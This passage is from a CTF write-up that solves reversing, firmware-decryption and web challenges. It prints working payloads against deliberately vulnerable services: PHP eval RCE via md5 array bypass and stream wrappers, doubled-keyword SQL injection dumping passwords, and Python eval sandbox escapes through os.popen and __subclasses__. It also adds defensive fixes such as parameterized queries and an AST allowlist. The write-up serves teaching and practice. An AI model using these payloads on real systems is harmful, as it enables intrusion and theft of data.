    v8 = [28, 6, 12, 20, 69, 18, 19]
    v11 = "s1mplex0r"
    v9 = [11, 1, 31, 47, 9, 81, 11, 73, 15]

    # Compute the flag
    flag = ""
    for i in range(len(s)):
        flag += chr(v8[i] ^ ord(s[i]))

    for j in range(len(v11)):
        flag += chr(v9[j] ^ ord(v11[j]))

    return flag


if __name__ == "__main__":
    print(f"Flag: {reverse_engineer_flag()}")
# Flag: htuctf{x0r_e4sy}

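Backing-Up Engineering (倒車工程)

Challenge

You recently learned about a car company that is developing a brand-new autonomous driving system. You are very interested in its "car-reversing engineering" (Reverse Engineering) module, but it requires a password to use. What to do? An employee tells you: reversing is easy, just turn the screen upside down (you grumble inwardly: uh, come on, what on earth does turning the screen upside down mean......)
Difficulty: easy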

# -*- coding: utf-8 -*-
"""
Car-reversing technology, we are the professionals! --2024.4.25 developed by EMT Reversing Company
"""

import time

# Reversing safety check
def compare_password(input_password):
    numbers = [0x48,0x54,0x55,0x43,0x54,0x46,0x7b,0x57,0x65,0x31,0x63,0x30,0x6d,0x65,0x5f,0x74,0x30,0x5f,0x72,0x33,0x76,0x65,0x72,0x73,0x65,0x5f,0x65,0x6e,0x67,0x31,0x6e,0x65,0x65,0x72,0x31,0x6e,0x67,0x7d]

    hex_password = [ord(char) for char in input_password]

    if hex_password == numbers:
        return True
    else:
        return False

# Main reversing system
def main():
    password = input("請輸入倒車密碼:")
    if compare_password(password):
        print("密碼正確!歡迎使用倒車系統。")
        print("自動倒車中......")
        time.sleep(5)
        print("倒車完成!請不要忘記你的密碼:{},歡迎下次使用".format(password))
    else:
        print("密碼錯誤!請重試。")

if __name__ == "__main__":
    main()

My solution:

exp:

numbers = [0x48, 0x54, 0x55, 0x43, 0x54, 0x46, 0x7b, 0x57, 0x65, 0x31, 0x63, 0x30, 0x6d, 0x65, 0x5f, 0x74, 0x30, 0x5f, 0x72, 0x33, 0x76, 0x65, 0x72, 0x73, 0x65, 0x5f, 0x65, 0x6e, 0x67, 0x31, 0x6e, 0x65, 0x65, 0x72, 0x31, 0x6e, 0x67, 0x7d]

flag = ''.join(chr(num) for num in numbers)

print(flag)
# HTUCTF{We1c0me_t0_r3verse_eng1neer1ng}

firmware_decryption

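Challenge

Your router broke. You extracted the router's original firmware (old_firmware.bin) and got a copy of the new firmware (new_firmware.bin).
But while upgrading you found that the new firmware is encrypted, so you thought: encryption and decryption! (the decrypted new firmware contains the flag)
Difficulty: hard

My solution:

1. We are given an encrypted new firmware image and an unencrypted one. Most likely the old firmware is an intermediate version that contains the program for decrypting the new firmware.

2. Opening the old firmware in HxD reveals a real signature, which is useful later.

3. After unpacking the old firmware with binwalk, grep -r download searches for the key term; download turns up in the file StartFirmwareDownload.php.

4. Analysis shows this is the key code: it first gets the signature from /etc/config/image_sign, reads it into the $image_sign variable, and runs encimg -d -i $fw_path, where $fw_path is the firmware to decrypt and -s is followed by the signature.

5. Looking up that signature file shows that the signature has been modified.

6. Open the encimg file in IDA and look at the printed messages to see what each argument does: -d is encryption, -s is the signature (the signature is related to decryption). A rough analysis shows it is AES256 encryption in CBC mode.

7. Now it only remains to run the encimg file. It is a 32-bit big-endian MIPS program, so it has to be run under qemu emulation. The signature is missing, though; recalling the signature in the old firmware, I tried decrypting with it. Decryption succeeded, and binwalk unpacks the new firmware.

8. View flag.txt in the flag folder to get the flag.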

WEB

debugme sign-in (debugme_簽到)

Challenge

Are you a developer?
Difficulty: sign-in

My solution:

A sign-in challenge; the answer is right there in the console.

easy_rce

Challenge

The simplest RCE: the eval function is very dangerous!
Can you escape md5's pursuit?
Difficulty: easy

 <?php
highlight_file(__FILE__);
error_reporting(0);
if($_GET['from']=="HTUCTF"){
    if((md5($_GET['m1']) == md5($_GET['m2'])) && ($_GET['m1'] !== $_GET['m2'])){
        eval($_POST['cmd']);
    }else{
        die("you cant put the same md5 value into here");
    }
}else{
    die("Wrong?Where are you from<br>");
}


?>
Wrong?Where are you from

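My solution:

An RCE sign-in challenge. Just go for it.

GET parameters (an array bypass is enough): ?from=HTUCTF&m1[]=123&m2[]=456

POST parameter (note: if the flag is not in the root directory, it is in the current directory): cmd=system("cat flag");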

HTUCTF{8cdae6c6-2f02-4c3f-9f75-4fd21098600d}

evalPHP

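Challenge

The first security rule of web development:
Never trust any user-supplied data!! Always perform security checks!!!
But Xiao Ming clearly scoffs at this; he thinks nobody can get execution through a statement that is guaranteed to raise an error.
Can you find a way around it and get the flag?
Difficulty: medium-hard

PHP file inclusion vulnerability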

 <?php
highlight_file(__FILE__);
$data = file_get_contents($_GET['file']);
if($data === "HTUCTF"){
    $cmd = $_POST['cmd'];
    eval($cmd."No_What_are_you_doing!!!");
}else{
    die("no,where are you from");
}
?>

Warning: file_get_contents(): Filename cannot be empty in /var/www/html/index.php on line 3
no,where are you from

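My solution:

The hint says it: PHP file inclusion vulnerability.

Of course you could tell even without the hint, haha. Thoughtful indeed!

A dirsearch scan of the site finds flag.php, and then the data:// pseudo-protocol can be used.

GET parameter: ?file=data://text/plain;base64,SFRVQ1RG

Note 1: SFRVQ1RG is the base64 encoding of HTUCTF. It needs to be encoded; without encoding it normally does not work (tested).

POST parameter: cmd=system("tac flag.php");?>

Note 2: tac is used here as a bypass; plain cat does not work.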

HTUCTF{15e0cd0a-3f7e-49c3-abaa-d81badb9898e}

evalPHP Returns (evalPHP捲土重來)

Challenge

The unintended solution has been fixed; this time it really is medium-hard.

 <?php
highlight_file(__FILE__);
$file = $_GET['file'];
if(isset($file)){
    if(preg_match("/^http|^ftp|^https|^data|^phar|^zip/i", $file)){
        die("bad hacker!!!");
    }
    $data = file_get_contents($file);
    if($data === "HTUCTF"){
        $cmd = $_POST['cmd'];
        if(preg_replace("/_|\(|\)|;|\w+|'|\s+|\*/", "", $cmd) === ""){
            eval($cmd."No_What_are_you_doing!!!");
        }else{
            die("No!!!!");
        }
        
    }else{
        die("no,where are you from");
    }
}
?>

My solution:

GET: ?file=compress.zlib://data://text/plian,HTUCTF

POST: cmd=system('tac f*');__halt_compiler();

HTUCTF{2c392f42-573b-4580-bb4b-613502d6bc04}

easy_SQL

Challenge

Simple SQL injection
Difficulty: medium

My solution:

There is a WAF; doubling the filtered keywords bypasses it.

The payloads are:

Dump the database name:
-admin'uunionnion/**/sselectelect/**/database()#

Dump the table names:
-admin'uunionnion/**/sselectelect/**/group_concat(table_name)/**/from/**/infoorrmation_schema.tables/**/where/**/table_schema='users'#

Dump the column names:
-admin'uunionnion/**/sselectelect/**/group_concat(column_name)/**/from/**/infoorrmation_schema.columns/**/where/**/table_name='users'#

Dump the flag:
-admin'uunionnion/**/sselectelect/**/group_concat(passwoorrd)/**/from/**/users#

HTUCTF{41f789fe-643c-4322-be0a-f05eaa584340}
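
Why the doubled keywords get through, and what to do instead, as an added example that is not the challenge's code. The blacklist below is an assumption inferred from the doubled words in the payloads above (uunionnion, sselectelect, infoorrmation, passwoorrd); the real WAF source is not shown on this page, and the table contents are constructed sample data.

```python
import re
import sqlite3

# Assumed keyword list, inferred from the payloads in the write-up.
BLACKLIST = ("union", "select", "or")
PATTERN = re.compile("|".join(BLACKLIST), re.IGNORECASE)

# Last payload from the write-up, used here only as filter input.
PAYLOAD = "-admin'uunionnion/**/sselectelect/**/group_concat(passwoorrd)/**/from/**/users#"


def strip_once(value):
    """Weak filter: delete blacklisted keywords in one left-to-right pass.
    Removing the inner keyword splices the outer letters into a new keyword."""
    return PATTERN.sub("", value)


def reject_if_listed(value):
    """Stricter blacklist: refuse the request instead of rewriting it.
    Returns True when the value is accepted. Still blocks harmless input."""
    return PATTERN.search(value) is None


def demo_db():
    """In-memory table with constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'constructed-sample-secret')")
    return conn


def find_user(conn, username):
    """The actual fix: bind the value as a parameter so it is always data, never SQL."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ?", (username,)
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    print("after single-pass strip:", strip_once(PAYLOAD))
    print("reject-mode accepts payload:", reject_if_listed(PAYLOAD))
    print("reject-mode accepts 'victor':", reject_if_listed("victor"))
    conn = demo_db()
    print("parameterized lookup of payload:", find_user(conn, PAYLOAD))
    print("parameterized lookup of admin:", find_user(conn, "admin"))
```

Rejecting instead of stripping stops this payload but also refuses ordinary names that contain "or", which is why the parameterized query is the change that matters.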

eznode

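Challenge

Do you like JavaScript, which handles both the front end and the back end?

You may want to learn a bit about JS and the HTTP protocol first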

const { readFileSync } = require('fs')
const express = require('express')

const flag = process.env['FLAG']
const app = express()
app.get("/", (req, res) => {
    res.setHeader('Content-Type', 'text/plain');
    res.send(readFileSync("./app.js", 'utf-8'))
})

app.get("/get_var", (req, res) => {
    let check = req.header("Check")
    if (check && check == [[[[[[[114514]]]]]]]) {
        let vara = req.query['var']
        if (vara && /^[a-zA-Z]+$/.test(vara)) {
            res.send(eval(vara))
        } else {
            res.send('invalid input!')
        }    
    } else {
        res.send("check failed")
    }
})

app.listen(80, () => {
    console.log("listening at 0.0.0.0:80");
});

My solution:

An easy one. The payload is:

GET parameter: /get_var?var=flag

Add the header check: 114514

flag{41dd607d-0ecb-475d-96ef-813da205430e}

python_eval_easy

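Challenge

This time we seem to have won the favor of the god of eval; he gives off a peculiar scent that led us here.
He has mysterious power and can turn your statements into reality.
Do you know how to get a shell in Python?
Difficulty: medium-easy

My solution:

The console reveals /tell?me=xxx

A typical sandbox. Get past the filter with %-encoding. The payload is: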

/tell?me=__import__(%22os%22).popen(%22cat%20/f*%22).read()

HTUCTF{a48bcee4-9d76-46a4-8ad4-51a9f44955ea}

EvalIt!!!

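Challenge

This time, it seems the god of eval's network isn't great? Can you still win the god of eval's trust?
Difficulty: medium

My solution:

View the source code with /tell?me=open('app.py').read()

len(data) < 28 imposes a length limit, so go straight to the /BackDoorsInGuoql route instead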

import requests
url = "http://xxx.xxx.xxx.xx:xxxxx/BackDoorsInGuoql"
data = {"eval": "str(''.__class__.__mro__[-1].__subclasses__()[132].__init__.__globals__['popen']('cat /f*').read())"}
response = requests.get(url=url,data=data)
print(response.text)
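
A defender's view of the two eval challenges above, as an added example that is not the challenge server's code: it assumes the server passes the request value to eval, and shows that neither a length cap nor emptied builtins contains it, while an AST allowlist refuses both payloads from this page without ever executing them.

```python
import ast

# Node types permitted in a calculator-style expression; everything else is refused.
ALLOWED = (ast.Expression, ast.BinOp, ast.UnaryOp, ast.Constant,
           ast.Add, ast.Sub, ast.Mult, ast.Div, ast.Mod, ast.USub, ast.UAdd)

# Payloads from the write-up (URL-decoded). They are only parsed here, never evaluated.
PAYLOAD_IMPORT = '__import__("os").popen("cat /f*").read()'
PAYLOAD_WALK = ("str(''.__class__.__mro__[-1].__subclasses__()[132]"
                ".__init__.__globals__['popen']('cat /f*').read())")


def violation(source, max_len=256):
    """Return None if source is plain arithmetic, otherwise the reason it is refused."""
    if len(source) > max_len:
        return "too long"
    try:
        tree = ast.parse(source, mode="eval")
    except SyntaxError:
        return "syntax error"
    for node in ast.walk(tree):
        if not isinstance(node, ALLOWED):
            return "disallowed node: " + type(node).__name__
        if isinstance(node, ast.Constant) and type(node.value) not in (int, float):
            return "disallowed constant"
    return None


def safe_eval(source):
    """Evaluate only expressions that pass the allowlist."""
    reason = violation(source)
    if reason is not None:
        raise ValueError(reason)
    code = compile(ast.parse(source, mode="eval"), "<expr>", "eval")
    return eval(code, {"__builtins__": {}}, {})


def classes_reachable_without_builtins():
    """Emptying __builtins__ is not a sandbox: object's subclass list is still
    reachable from a string literal, which is the first half of the second payload."""
    classes = eval("''.__class__.__mro__[-1].__subclasses__()", {"__builtins__": {}})
    return len(classes)


if __name__ == "__main__":
    for expr in ("1+2*3", "().__class__", PAYLOAD_IMPORT, PAYLOAD_WALK):
        print(repr(expr[:40]), "->", violation(expr) or "allowed")
    print("classes reachable with empty builtins:", classes_reachable_without_builtins())
```

The 12-character expression `().__class__` is refused for its node type, not its size, which is the check a `len(data) < 28` limit cannot provide.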
